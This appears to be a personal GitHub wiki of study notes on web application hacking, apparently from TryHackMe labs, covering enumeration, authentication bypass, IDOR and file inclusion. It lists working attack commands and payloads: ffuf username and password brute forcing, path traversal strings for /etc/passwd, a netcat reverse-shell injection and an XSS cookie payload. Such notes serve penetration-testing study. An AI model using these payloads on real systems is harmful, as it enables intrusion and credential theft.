WebApplication Hacking - singirikondamani/Noted GitHub Wiki

  1. Use Gobuster To Find Hidden Website Pages: gobuster -u http://fakebank.thm -w wordlist.txt dir

Source code review:

  1. To view the source code of the website can use the - view-source:http://www.gsg.com in browser to get the source code.
  2. To find the weather the website is open the directory listing - /assets adding end of the url

Developer Tools Inspect

  • There are like debugging option source code and network tap can see the server request and response

Content Discovery in the website

  • Content can be many things, a file, video, picture, backup, a website feature, When we talk about content discovery, we're not talking about the obvious things we can see on a website; it's the things that aren't immediately presented to us and that weren't always intended for public access, This content could be, for example, pages or portals intended for staff usage, older versions of the website, backup files, configuration files, administration panels, etc.

  • Robot.txt: file used for web crawling and developer tell the browser which page need to restricted and allowed pentesters can identify which pages are access and not view file: http://www.hfhf.com/robot.txt

  • Manual Discovery: - Sitemap.xml file gives a list of every file the website owner wishes to be listed on a search engine, These can sometimes contain areas of the website that are a bit more difficult to navigate to or even list some old webpages that the current site no longer uses but are still working behind the scenes. view file: http://www.hfhf.com/sitemap.xml

  • Manual Discovery - HTTP Headers: Sensitive information from HTTP headers request and responses View by using: CURL -I url, Burp suite other tools

  • Wappalyzer Tool: which identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more.

  • Wayback Machine: to get the older website versions

  • Automated Discovery : ffuf, dirb, Gobuster

  1. ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.248.83/FUZZ
  2. dirb http://10.10.248.83/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
  3. gobuster dir --url http://10.10.248.83/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

Subdomain Enumeration

why: Subdomain enumeration is the process of finding valid subdomains for a domain, but why do we do this? We do this to expand our attack surface to try and discover more potential points of vulnerability.

Three different subdomain enumeration methods:

Brute Force, OSINT (Open-Source Intelligence) and Virtual Host.

  1. SSL/TLS Certificates: We can use this service to our advantage to discover subdomains belonging to a domain, sites like https://crt.sh and https://ui.ctsearch.entrust.com/ui/ctsearchui offer a searchable database of certificates that shows current and historical results.
  2. Search Engines: Go to Google and use the search term site:*.tryhackme.com -site:www.tryhackme.com, which should reveal a subdomain for tryhackme.com.
  3. Bruteforce DNS: we are using a tool called dnsrecon to perform this:dnsrecon -t brt -d acmeitsupport.thm (-t for tool , brt type of enumeration like std: Performs a standard DNS query, brt: Brute forces subdomain, rvl: Reverse lookup of a given IP range, srv: Query for SRV (Service) records, axfr, tld: Tries to locate a DNS Top-Level Domain (TLD))
  4. Automation Using Sublist3r: ./sublist3r.py -d acmeitsupport.thm
  5. Virtual Hosts: This is to find subdomains that aren’t publicly visible by using wordlists and adjusting the Host header to see if you can get any responses from the server about hidden subdomain using the ffuf tool- ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.203.8 -mc 200 -fs {size} (-mc filter by status code, -fs filter by packet size reduce noise)

Authentication Bypass

  1. Username Enumeration: ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.16.240/customers/signup -mr "username already exists" (-mr is string to capture).
  2. Username and password Enumeration: ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.16.240/customers/login -fc 200
  3. Logic Flaw for unauthorized access: when the developer use the $request in code which means GET and POST can be send at a time where can able to modify the request in reset page to receive the victim password reset link.
  4. Cookie Tampering :
  • Try to change the Plain Text cookie weather get access or for example Set-Cookie: logged_in=true; Max-Age=3600; Path=/, Set-Cookie: admin=false; Max-Age=3600; Path=/ if there is anything like that try to change and see what is the results.
  • Hash sometime the cookie come in hash, we can see the value using the hash
  • Encoding Encoding is similar to hashing which can reversible easily.

IDOR

IDOR stands for Insecure Direct Object Reference and is a type of access control vulnerability

  1. Identify the URL where they used the id= or any account related staff and try to change and check arround weather the website has IDOR vulnerable or not
  2. Finding IDORs in Encoded IDs and decode and try the access
  3. Finding IDORs in Hashed IDs commonly used is MD5
  4. Finding IDORs in Unpredictable IDs: If the Id cannot be detected using the above methods, an excellent method of IDOR detection is to create two accounts and swap the Id numbers between them.

File Inclusion

  1. Path Traversal: This attacking can perform by using the tool dot-dot-slash
  2. Manual can exploit this vulnerability by: http://webapp.thm/get.php?file=../../../../etc/passwd (used 4 ../)
  3. while performing the the black box local file inclusion attack remember that at first give some invalid input based on error message try to craft the payload and try injection attack but when your try it try to add the %00 at the end for ignore the .php ../../../../etc/passwd%00.
  4. Sometimes, filters block specific keywords like /etc/passwd. You can bypass this with Current Directory Trick: Adding /.. or /. to confuse the filter or ....//....//....//etc/passwd
  5. Try it from url if the website block or filter, and error message is the friend to exploit this.
  6. Remote File Inclusion - RFI image

Common Injections:

  • Inject the shell script in search :- 127.0.0.1 && nc -e /bin/sh 127.0.0.1 8888
  • Setup the NC listing : nc -lvnp 8888

File Inclusion:

  • Low place this on the URL : ..././..././.././.././.././.././etc/passwd
  • medium place in url = : file:///etc/passwd

XXS DOM

  • XSS DOM <script>alert(document.cookie)</script>
  • tool used for testing : PwnXSS - python3 pwnxss.py -u http://testphp.vulnweb.com
  • it will show the possible command copy and past in browser url to execute the xss :
⚠️ **GitHub.com Fallback** ⚠️